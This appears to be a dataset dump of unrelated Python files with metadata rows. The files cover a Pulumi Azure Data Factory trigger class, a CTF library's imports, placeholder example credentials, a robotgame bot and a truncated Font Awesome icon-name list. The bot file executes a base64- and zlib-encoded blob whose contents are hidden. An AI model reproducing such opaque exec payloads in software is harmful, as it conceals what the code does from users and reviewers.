pulumi.set(__self__, "start_time", start_time)
if activated is not None:
pulumi.set(__self__, "activated", activated)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if delay is not None:
pulumi.set(__self__, "delay", delay)
if description is not None:
pulumi.set(__self__, "description", description)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if max_concurrency is not None:
pulumi.set(__self__, "max_concurrency", max_concurrency)
if name is not None:
pulumi.set(__self__, "name", name)
if retry is not None:
pulumi.set(__self__, "retry", retry)
if trigger_dependencies is not None:
pulumi.set(__self__, "trigger_dependencies", trigger_dependencies)
@property
@pulumi.getter(name="dataFactoryId")
def data_factory_id(self) -> pulumi.Input[str]:
return pulumi.get(self, "data_factory_id")
@data_factory_id.setter
def data_factory_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_factory_id", value)
@property
@pulumi.getter
def frequency(self) -> pulumi.Input[str]:
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: pulumi.Input[str]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def interval(self) -> pulumi.Input[int]:
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: pulumi.Input[int]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter
def pipeline(self) -> pulumi.Input['TriggerTumblingWindowPipelineArgs']:
return pulumi.get(self, "pipeline")
@pipeline.setter
def pipeline(self, value: pulumi.Input['TriggerTumblingWindowPipelineArgs']):
pulumi.set(self, "pipeline", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Input[str]:
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: pulumi.Input[str]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter
def activated(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "activated")
@activated.setter
def activated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "activated", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def delay(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "end_time")
@end_time.setter
def end_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_time", value)
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_concurrency")
@max_concurrency.setter
def max_concurrency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrency", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def retry(self) -> Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]:
return pulumi.get(self, "retry")
@retry.setter
def retry(self, value: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]):
pulumi.set(self, "retry", value)
@property
@pulumi.getter(name="triggerDependencies")
def trigger_dependencies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]:
return pulumi.get(self, "trigger_dependencies")
@trigger_dependencies.setter
def trigger_dependencies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]):
pulumi.set(self, "trigger_dependencies", value)
@pulumi.input_type
class _TriggerTumblingWindowState:
def __init__(__self__, *,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input['TriggerTumblingWindowPipelineArgs']] = None,
retry: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]] = None):
"""
Input properties used for looking up and filtering TriggerTumblingWindow resources.
"""
if activated is not None:
pulumi.set(__self__, "activated", activated)
if additional_properties is not None:
pulumi.set(__self__, "additional_properties", additional_properties)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if data_factory_id is not None:
pulumi.set(__self__, "data_factory_id", data_factory_id)
if delay is not None:
pulumi.set(__self__, "delay", delay)
if description is not None:
pulumi.set(__self__, "description", description)
if end_time is not None:
pulumi.set(__self__, "end_time", end_time)
if frequency is not None:
pulumi.set(__self__, "frequency", frequency)
if interval is not None:
pulumi.set(__self__, "interval", interval)
if max_concurrency is not None:
pulumi.set(__self__, "max_concurrency", max_concurrency)
if name is not None:
pulumi.set(__self__, "name", name)
if pipeline is not None:
pulumi.set(__self__, "pipeline", pipeline)
if retry is not None:
pulumi.set(__self__, "retry", retry)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
if trigger_dependencies is not None:
pulumi.set(__self__, "trigger_dependencies", trigger_dependencies)
@property
@pulumi.getter
def activated(self) -> Optional[pulumi.Input[bool]]:
return pulumi.get(self, "activated")
@activated.setter
def activated(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "activated", value)
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
return pulumi.get(self, "additional_properties")
@additional_properties.setter
def additional_properties(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "additional_properties", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="dataFactoryId")
def data_factory_id(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "data_factory_id")
@data_factory_id.setter
def data_factory_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_factory_id", value)
@property
@pulumi.getter
def delay(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "delay")
@delay.setter
def delay(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "delay", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="endTime")
def end_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "end_time")
@end_time.setter
def end_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "end_time", value)
@property
@pulumi.getter
def frequency(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "frequency")
@frequency.setter
def frequency(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "frequency", value)
@property
@pulumi.getter
def interval(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "interval")
@interval.setter
def interval(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "interval", value)
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "max_concurrency")
@max_concurrency.setter
def max_concurrency(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_concurrency", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def pipeline(self) -> Optional[pulumi.Input['TriggerTumblingWindowPipelineArgs']]:
return pulumi.get(self, "pipeline")
@pipeline.setter
def pipeline(self, value: Optional[pulumi.Input['TriggerTumblingWindowPipelineArgs']]):
pulumi.set(self, "pipeline", value)
@property
@pulumi.getter
def retry(self) -> Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]:
return pulumi.get(self, "retry")
@retry.setter
def retry(self, value: Optional[pulumi.Input['TriggerTumblingWindowRetryArgs']]):
pulumi.set(self, "retry", value)
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "start_time")
@start_time.setter
def start_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "start_time", value)
@property
@pulumi.getter(name="triggerDependencies")
def trigger_dependencies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]:
return pulumi.get(self, "trigger_dependencies")
@trigger_dependencies.setter
def trigger_dependencies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['TriggerTumblingWindowTriggerDependencyArgs']]]]):
pulumi.set(self, "trigger_dependencies", value)
class TriggerTumblingWindow(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowPipelineArgs']]] = None,
retry: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowRetryArgs']]] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TriggerTumblingWindowTriggerDependencyArgs']]]]] = None,
__props__=None):
"""
Create a TriggerTumblingWindow resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: TriggerTumblingWindowArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a TriggerTumblingWindow resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param TriggerTumblingWindowArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(TriggerTumblingWindowArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowPipelineArgs']]] = None,
retry: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowRetryArgs']]] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TriggerTumblingWindowTriggerDependencyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = TriggerTumblingWindowArgs.__new__(TriggerTumblingWindowArgs)
__props__.__dict__["activated"] = activated
__props__.__dict__["additional_properties"] = additional_properties
__props__.__dict__["annotations"] = annotations
if data_factory_id is None and not opts.urn:
raise TypeError("Missing required property 'data_factory_id'")
__props__.__dict__["data_factory_id"] = data_factory_id
__props__.__dict__["delay"] = delay
__props__.__dict__["description"] = description
__props__.__dict__["end_time"] = end_time
if frequency is None and not opts.urn:
raise TypeError("Missing required property 'frequency'")
__props__.__dict__["frequency"] = frequency
if interval is None and not opts.urn:
raise TypeError("Missing required property 'interval'")
__props__.__dict__["interval"] = interval
__props__.__dict__["max_concurrency"] = max_concurrency
__props__.__dict__["name"] = name
if pipeline is None and not opts.urn:
raise TypeError("Missing required property 'pipeline'")
__props__.__dict__["pipeline"] = pipeline
__props__.__dict__["retry"] = retry
if start_time is None and not opts.urn:
raise TypeError("Missing required property 'start_time'")
__props__.__dict__["start_time"] = start_time
__props__.__dict__["trigger_dependencies"] = trigger_dependencies
super(TriggerTumblingWindow, __self__).__init__(
'azure:datafactory/triggerTumblingWindow:TriggerTumblingWindow',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
activated: Optional[pulumi.Input[bool]] = None,
additional_properties: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
annotations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
data_factory_id: Optional[pulumi.Input[str]] = None,
delay: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
end_time: Optional[pulumi.Input[str]] = None,
frequency: Optional[pulumi.Input[str]] = None,
interval: Optional[pulumi.Input[int]] = None,
max_concurrency: Optional[pulumi.Input[int]] = None,
name: Optional[pulumi.Input[str]] = None,
pipeline: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowPipelineArgs']]] = None,
retry: Optional[pulumi.Input[pulumi.InputType['TriggerTumblingWindowRetryArgs']]] = None,
start_time: Optional[pulumi.Input[str]] = None,
trigger_dependencies: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['TriggerTumblingWindowTriggerDependencyArgs']]]]] = None) -> 'TriggerTumblingWindow':
"""
Get an existing TriggerTumblingWindow resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _TriggerTumblingWindowState.__new__(_TriggerTumblingWindowState)
__props__.__dict__["activated"] = activated
__props__.__dict__["additional_properties"] = additional_properties
__props__.__dict__["annotations"] = annotations
__props__.__dict__["data_factory_id"] = data_factory_id
__props__.__dict__["delay"] = delay
__props__.__dict__["description"] = description
__props__.__dict__["end_time"] = end_time
__props__.__dict__["frequency"] = frequency
__props__.__dict__["interval"] = interval
__props__.__dict__["max_concurrency"] = max_concurrency
__props__.__dict__["name"] = name
__props__.__dict__["pipeline"] = pipeline
__props__.__dict__["retry"] = retry
__props__.__dict__["start_time"] = start_time
__props__.__dict__["trigger_dependencies"] = trigger_dependencies
return TriggerTumblingWindow(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def activated(self) -> pulumi.Output[Optional[bool]]:
return pulumi.get(self, "activated")
@property
@pulumi.getter(name="additionalProperties")
def additional_properties(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
return pulumi.get(self, "additional_properties")
@property
@pulumi.getter
def annotations(self) -> pulumi.Output[Optional[Sequence[str]]]:
return pulumi.get(self, "annotations")
@property
@pulumi.getter(name="dataFactoryId")
def data_factory_id(self) -> pulumi.Output[str]:
return pulumi.get(self, "data_factory_id")
@property
@pulumi.getter
def delay(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "delay")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "description")
@property
@pulumi.getter(name="endTime")
def end_time(self) -> pulumi.Output[Optional[str]]:
return pulumi.get(self, "end_time")
@property
@pulumi.getter
def frequency(self) -> pulumi.Output[str]:
return pulumi.get(self, "frequency")
@property
@pulumi.getter
def interval(self) -> pulumi.Output[int]:
return pulumi.get(self, "interval")
@property
@pulumi.getter(name="maxConcurrency")
def max_concurrency(self) -> pulumi.Output[Optional[int]]:
return pulumi.get(self, "max_concurrency")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
return pulumi.get(self, "name")
@property
@pulumi.getter
def pipeline(self) -> pulumi.Output['outputs.TriggerTumblingWindowPipeline']:
return pulumi.get(self, "pipeline")
@property
@pulumi.getter
def retry(self) -> pulumi.Output[Optional['outputs.TriggerTumblingWindowRetry']]:
return pulumi.get(self, "retry")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> pulumi.Output[str]:
return pulumi.get(self, "start_time")
@property
@pulumi.getter(name="triggerDependencies")
def trigger_dependencies(self) -> pulumi.Output[Optional[Sequence['outputs.TriggerTumblingWindowTriggerDependency']]]:
return pulumi.get(self, "trigger_dependencies")
| 42.678571 | 180 | 0.65542 | 2,781 | 26,290 | 5.944984 | 0.057533 | 0.110446 | 0.137906 | 0.071856 | 0.862396 | 0.836085 | 0.807234 | 0.77808 | 0.751043 | 0.720317 | 0 | 0.000049 | 0.227691 | 26,290 | 615 | 181 | 42.747967 | 0.814224 | 0.04515 | 0 | 0.803607 | 1 | 0 | 0.129014 | 0.055355 | 0 | 0 | 0 | 0 | 0 | 1 | 0.164329 | false | 0.002004 | 0.014028 | 0.09018 | 0.276553 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3d43a734242fc6c1949c74a6d80a1aa914366839 | 205 | py | Python | scryptos/__init__.py | scryptos/scryptoslib | bdde5b26dfbf7473b53c22408f97db44821ccbb3 | [
"MIT"
] | 30 | 2018-10-10T13:48:22.000Z | 2022-03-14T07:03:57.000Z | scryptos/__init__.py | scryptos/scryptoslib | bdde5b26dfbf7473b53c22408f97db44821ccbb3 | [
"MIT"
] | 2 | 2018-10-12T10:05:03.000Z | 2020-05-18T22:53:15.000Z | scryptos/__init__.py | scryptos/scryptoslib | bdde5b26dfbf7473b53c22408f97db44821ccbb3 | [
"MIT"
] | 5 | 2018-10-10T16:11:54.000Z | 2021-04-04T13:13:53.000Z | """
A CTF Library
"""
from __future__ import absolute_import, division, print_function
from scryptos.util import *
from scryptos.math import *
from scryptos.crypto import *
from scryptos.wrapper import *
| 20.5 | 64 | 0.785366 | 27 | 205 | 5.740741 | 0.555556 | 0.309677 | 0.348387 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136585 | 205 | 9 | 65 | 22.777778 | 0.875706 | 0.063415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.2 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
e9e6252d46916013ace7c99ad88c162bc18c9b0d | 102 | py | Python | src/passwords.py | waynecrasta/UIUC-Course-Hunter | e28caab9da4cde39df808628b75ca016f42d0593 | [
"BSD-2-Clause"
] | 3 | 2016-04-09T07:06:59.000Z | 2017-04-18T02:30:05.000Z | src/passwords.py | waynecrasta/UIUC-Course-Hunter | e28caab9da4cde39df808628b75ca016f42d0593 | [
"BSD-2-Clause"
] | null | null | null | src/passwords.py | waynecrasta/UIUC-Course-Hunter | e28caab9da4cde39df808628b75ca016f42d0593 | [
"BSD-2-Clause"
] | 1 | 2021-01-25T19:56:41.000Z | 2021-01-25T19:56:41.000Z | details = {'email': 'example@example.com', 'password': 'example', 'recipient': 'example@example.com'}
| 51 | 101 | 0.686275 | 11 | 102 | 6.363636 | 0.545455 | 0.4 | 0.485714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078431 | 102 | 1 | 102 | 102 | 0.744681 | 0 | 0 | 0 | 0 | 0 | 0.656863 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
1823bf0bd3c5c7af3f331add8e9200f69af48624 | 607 | py | Python | robogen/rgkit/backup bots/Wall-E.py | andrewgailey/robogen | 7e96cfa26d2e6dc383c5d205816ddd98f8f100d7 | [
"Unlicense"
] | null | null | null | robogen/rgkit/backup bots/Wall-E.py | andrewgailey/robogen | 7e96cfa26d2e6dc383c5d205816ddd98f8f100d7 | [
"Unlicense"
] | null | null | null | robogen/rgkit/backup bots/Wall-E.py | andrewgailey/robogen | 7e96cfa26d2e6dc383c5d205816ddd98f8f100d7 | [
"Unlicense"
] | null | null | null | import base64,zlib
exec zlib.decompress(base64.decodestring('eJxtks1u4yAUhfd5CrqYAiPbapdjxDzEbC0rwvyZBAMBnKhvX7DrVKpmxeVwzne5CLMEHzOIuonM\nCb+QG4UpsIeDJFLIcmb8CkmiA0yr4UZIOJJMo+6s5+nMol+dIBdq2TIJBq79Tun47A2XyJqU0RVj\nsh4O2yeZUUa2QdBPqeCthA0uFk3b95OQCsiS6BW9lIUsHRMCKUyizGt0A1z8vfjVeOKWpQT++cnn\n/gRqjvGMXONx2QJt/cQs0M1SNkYB39X4C9W9pntNFlpvgsv5vUixghJR1NXJWDbekXlz3DExWzE8\ngPIRPIBxYK7Q+/AYu2DZh4xnI15K9LkZMeF0rRcXlLf7yKpBt23SsOGUsVlG9HwX87oiixteDFPJ\nzG1ovy6vf72/UfpWXhbcavP99c/5I8hUWtR5q21qRc+oRGWtUwFpi1hBu7xVXwdJFimdDs+rORh/\nflvpUBHwX9fNYZP/x96D064dypN61ENsLhtsPFqFQw3f2g/2T/LBgnplUcAa2z8DYJ+IPdiH\n'))
| 202.333333 | 587 | 0.93575 | 32 | 607 | 17.75 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14262 | 0.00659 | 607 | 2 | 588 | 303.5 | 0.799337 | 0 | 0 | 0 | 0 | 0.5 | 0.892916 | 0.892916 | 0 | 1 | 0 | 0 | 0 | 0 | null | null | 0 | 0.5 | null | null | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 9 |
43fa71cdef97b02c41bbe3853a35e38c809f92ac | 70,659 | py | Python | icons/names.py | DungeonMasterXLII/merit-api | 07e7e10d44ade9a1943009c7a183147fab4e96ef | [
"MIT"
] | null | null | null | icons/names.py | DungeonMasterXLII/merit-api | 07e7e10d44ade9a1943009c7a183147fab4e96ef | [
"MIT"
] | 1 | 2021-11-23T17:56:07.000Z | 2021-11-23T17:56:07.000Z | icons/names.py | DungeonMasterXLII/merit-api | 07e7e10d44ade9a1943009c7a183147fab4e96ef | [
"MIT"
] | 2 | 2022-03-03T15:43:50.000Z | 2022-03-31T15:08:29.000Z | FA_ICON_NAMES = [("fa500px","fa500px"),("faAbacus","faAbacus"),("faAccessibleIcon","faAccessibleIcon"),("faAccusoft","faAccusoft"),("faAcorn","faAcorn"),("faAcquisitionsIncorporated","faAcquisitionsIncorporated"),("faAd","faAd"),("faAddressBook","faAddressBook"),("faAddressCard","faAddressCard"),("faAdjust","faAdjust"),("faAdn","faAdn"),("faAdversal","faAdversal"),("faAffiliatetheme","faAffiliatetheme"),("faAirConditioner","faAirConditioner"),("faAirFreshener","faAirFreshener"),("faAirbnb","faAirbnb"),("faAlarmClock","faAlarmClock"),("faAlarmExclamation","faAlarmExclamation"),("faAlarmPlus","faAlarmPlus"),("faAlarmSnooze","faAlarmSnooze"),("faAlbum","faAlbum"),("faAlbumCollection","faAlbumCollection"),("faAlgolia","faAlgolia"),("faAlicorn","faAlicorn"),("faAlien","faAlien"),("faAlienMonster","faAlienMonster"),("faAlignCenter","faAlignCenter"),("faAlignJustify","faAlignJustify"),("faAlignLeft","faAlignLeft"),("faAlignRight","faAlignRight"),("faAlignSlash","faAlignSlash"),("faAlipay","faAlipay"),("faAllergies","faAllergies"),("faAmazon","faAmazon"),("faAmazonPay","faAmazonPay"),("faAmbulance","faAmbulance"),("faAmericanSignLanguageInterpreting","faAmericanSignLanguageInterpreting"),("faAmilia","faAmilia"),("faAmpGuitar","faAmpGuitar"),("faAnalytics","faAnalytics"),("faAnchor","faAnchor"),("faAndroid","faAndroid"),("faAngel","faAngel"),("faAngellist","faAngellist"),("faAngleDoubleDown","faAngleDoubleDown"),("faAngleDoubleLeft","faAngleDoubleLeft"),("faAngleDoubleRight","faAngleDoubleRight"),("faAngleDoubleUp","faAngleDoubleUp"),("faAngleDown","faAngleDown"),("faAngleLeft","faAngleLeft"),("faAngleRight","faAngleRight"),("faAngleUp","faAngleUp"),("faAngry","faAngry"),("faAngrycreative","faAngrycreative"),("faAngular","faAngular"),("faAnkh","faAnkh"),("faAppStore","faAppStore"),("faAppStoreIos","faAppStoreIos"),("faApper","faApper"),("faApple","faApple"),("faAppleAlt","faAppleAlt"),("faAppleCrate","faAppleCrate
"),("faApplePay","faApplePay"),("faArchive","faArchive"),("faArchway","faArchway"),("faArrowAltCircleDown","faArrowAltCircleDown"),("faArrowAltCircleLeft","faArrowAltCircleLeft"),("faArrowAltCircleRight","faArrowAltCircleRight"),("faArrowAltCircleUp","faArrowAltCircleUp"),("faArrowAltDown","faArrowAltDown"),("faArrowAltFromBottom","faArrowAltFromBottom"),("faArrowAltFromLeft","faArrowAltFromLeft"),("faArrowAltFromRight","faArrowAltFromRight"),("faArrowAltFromTop","faArrowAltFromTop"),("faArrowAltLeft","faArrowAltLeft"),("faArrowAltRight","faArrowAltRight"),("faArrowAltSquareDown","faArrowAltSquareDown"),("faArrowAltSquareLeft","faArrowAltSquareLeft"),("faArrowAltSquareRight","faArrowAltSquareRight"),("faArrowAltSquareUp","faArrowAltSquareUp"),("faArrowAltToBottom","faArrowAltToBottom"),("faArrowAltToLeft","faArrowAltToLeft"),("faArrowAltToRight","faArrowAltToRight"),("faArrowAltToTop","faArrowAltToTop"),("faArrowAltUp","faArrowAltUp"),("faArrowCircleDown","faArrowCircleDown"),("faArrowCircleLeft","faArrowCircleLeft"),("faArrowCircleRight","faArrowCircleRight"),("faArrowCircleUp","faArrowCircleUp"),("faArrowDown","faArrowDown"),("faArrowFromBottom","faArrowFromBottom"),("faArrowFromLeft","faArrowFromLeft"),("faArrowFromRight","faArrowFromRight"),("faArrowFromTop","faArrowFromTop"),("faArrowLeft","faArrowLeft"),("faArrowRight","faArrowRight"),("faArrowSquareDown","faArrowSquareDown"),("faArrowSquareLeft","faArrowSquareLeft"),("faArrowSquareRight","faArrowSquareRight"),("faArrowSquareUp","faArrowSquareUp"),("faArrowToBottom","faArrowToBottom"),("faArrowToLeft","faArrowToLeft"),("faArrowToRight","faArrowToRight"),("faArrowToTop","faArrowToTop"),("faArrowUp","faArrowUp"),("faArrows","faArrows"),("faArrowsAlt","faArrowsAlt"),("faArrowsAltH","faArrowsAltH"),("faArrowsAltV","faArrowsAltV"),("faArrowsH","faArrowsH"),("faArrowsV","faArrowsV"),("faArtstation","faArtstation"),("faAssistiveListeningSystems","faAssistiveListeningSystems"),("faAsterisk","faAsterisk"),("faAsymmetri
